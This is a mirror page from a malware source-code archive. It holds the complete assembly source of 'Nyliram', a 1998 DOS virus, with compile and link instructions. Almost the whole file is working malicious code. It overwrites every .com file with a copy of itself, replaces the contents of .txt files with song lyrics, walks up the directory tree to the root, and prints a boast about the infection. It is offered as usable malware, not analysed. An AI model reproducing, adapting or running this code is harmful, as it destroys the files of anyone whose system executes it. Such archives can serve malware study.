mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
121 lines
5.9 KiB
NASM
121 lines
5.9 KiB
NASM
|
; ------------------------------------------------------------------------- ;
|
||
|
; Nyliram v1.0 coded by KilJaeden of The Codebreakers 1998 ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
; to compile ::] tasm nyliram.asm ;
|
||
|
; to link :::::] tlink /t nyliram.obj ;
|
||
|
; --------------------------------------------------------------------------;
|
||
|
|
||
|
code segment ; segment named code
|
||
|
assume cs:code,ds:code ; assign cs and ds to code
|
||
|
org 100h ; .com file 100 hex
|
||
|
main proc near ; main procedure near
|
||
|
|
||
|
first_com:
|
||
|
mov ah,4eh ; find the first file
|
||
|
|
||
|
find_first_com:
|
||
|
xor cx,cx ; cx to 0
|
||
|
lea dx,comfile ; load *.com into dx
|
||
|
int 21h ; make it so DOS!
|
||
|
jc first_txt ; if no .com found, find .txt
|
||
|
|
||
|
open_com:
|
||
|
mov ax,3d02h ; open file with read/write
|
||
|
mov dx,9eh ; get file name from DTA (80+1e)
|
||
|
int 21h ; make it so DOS!
|
||
|
|
||
|
infect_com:
|
||
|
xchg bx,ax ; move file info from ax to bx
|
||
|
mov ah,40h ; write to file
|
||
|
mov cx,offset finish - offset first_com ; replace with
|
||
|
lea dx,first_com ; load effective address
|
||
|
int 21h ; make it so DOS!
|
||
|
|
||
|
close_com:
|
||
|
mov ah,3eh ; close the file
|
||
|
int 21h ; make it so DOS!
|
||
|
mov ah,4fh ; find next file
|
||
|
jmp find_first_com ; jump to find_first_com
|
||
|
|
||
|
first_txt:
|
||
|
mov ah,4eh ; find first file
|
||
|
|
||
|
find_first_txt:
|
||
|
xor cx,cx ; cx to 0
|
||
|
lea dx,txtfile ; load effective address *.txt
|
||
|
int 21h ; make it so DOS!
|
||
|
jc next_dir ; if none found, leave
|
||
|
|
||
|
open_txt:
|
||
|
mov ax,3d02h ; open file with read/write
|
||
|
mov dx,9eh ; get file name info
|
||
|
int 21h ; make it so DOS!
|
||
|
|
||
|
infect_txt:
|
||
|
xchg bx,ax ; put file info into bx
|
||
|
mov ah,40h ; write to file
|
||
|
mov cx,offset pload_finish - offset pload_start ; replace with
|
||
|
lea dx,pload_start ; load effective address
|
||
|
int 21h ; make it so DOS!
|
||
|
|
||
|
close_txt:
|
||
|
mov ah,3eh ; close up the file
|
||
|
int 21h ; make it so DOS!
|
||
|
mov ah,4fh ; find next file
|
||
|
jmp find_first_txt ; jump to start again
|
||
|
|
||
|
next_dir:
|
||
|
lea dx,dotdot ; load .. into dx
|
||
|
mov ah,3bh ; the int for changing directories
|
||
|
int 21h ; make it so!
|
||
|
jnc first_com ; jump to first com, start again!
|
||
|
|
||
|
end_virus:
|
||
|
mov ah,09h ; print a message
|
||
|
mov dx,offset done ; the message
|
||
|
int 21h ; make it so DOS!
|
||
|
int 20h ; end the program
|
||
|
|
||
|
pload_start:
|
||
|
db 'There''s not much left to love',10 ; payload in txt
|
||
|
db 'Too tired today to hate',10 ; payload in txt
|
||
|
db 'I feel the minute of decay',10 ; payload in txt
|
||
|
db 'I''m on my way down now',10 ; payload in txt
|
||
|
db 'I''d like to take you with me',10 ; payload in txt
|
||
|
db 'I''m on my way down...',10 ; payload in txt
|
||
|
db 'I''m on my way down now',10 ; payload in txt
|
||
|
db 'I''d like to take you with me',10 ; payload in txt
|
||
|
db 'I''m on my way down now',10 ; payload in txt
|
||
|
db 'The minute that it''s born',10 ; payload in txt
|
||
|
db 'It begins to die',10 ; payload in txt
|
||
|
db 'I''d love to just give in',10 ; payload in txt
|
||
|
db 'I''d love to live this lie',10 ; payload in txt
|
||
|
db 'I''ve been to black and back',10 ; payload in txt
|
||
|
db 'I''ve whited out my name',10 ; payload in txt
|
||
|
db 'A lack of pain, a lack of hope',10 ; payload in txt
|
||
|
db 'A lack of anything to say',10 ; payload in txt
|
||
|
db 'There is no cure for what is killing me',10 ; payload in txt
|
||
|
db 'I''m on my way down',10 ; payload in txt
|
||
|
db 'I''ve looked ahead and saw',10 ; payload in txt
|
||
|
db 'A world that''s dead',10 ; payload in txt
|
||
|
db 'I guess that I am too',10 ; payload in txt
|
||
|
db ' ',10 ; payload in txt
|
||
|
db 'I''m On My Way Down Now',10 ; payload in txt
|
||
|
pload_finish label near ; the end label
|
||
|
|
||
|
data_area:
|
||
|
dotdot db "..",0
|
||
|
comfile db "*.com",0
|
||
|
txtfile db "*.txt",0
|
||
|
done db ' ',10,13
|
||
|
db '***********************************************************',10,13
|
||
|
db 'You have infected all .com .txt files from this directory ',10,13
|
||
|
db 'to the root directory with the Nyliram virus, written by: ',10,13
|
||
|
db ' KilJaeden of the Codebreakers ''98 ',10,13
|
||
|
db '***********************************************************',10,13,'$'
|
||
|
|
||
|
finish label near
|
||
|
main endp
|
||
|
code ends
|
||
|
end first_com
|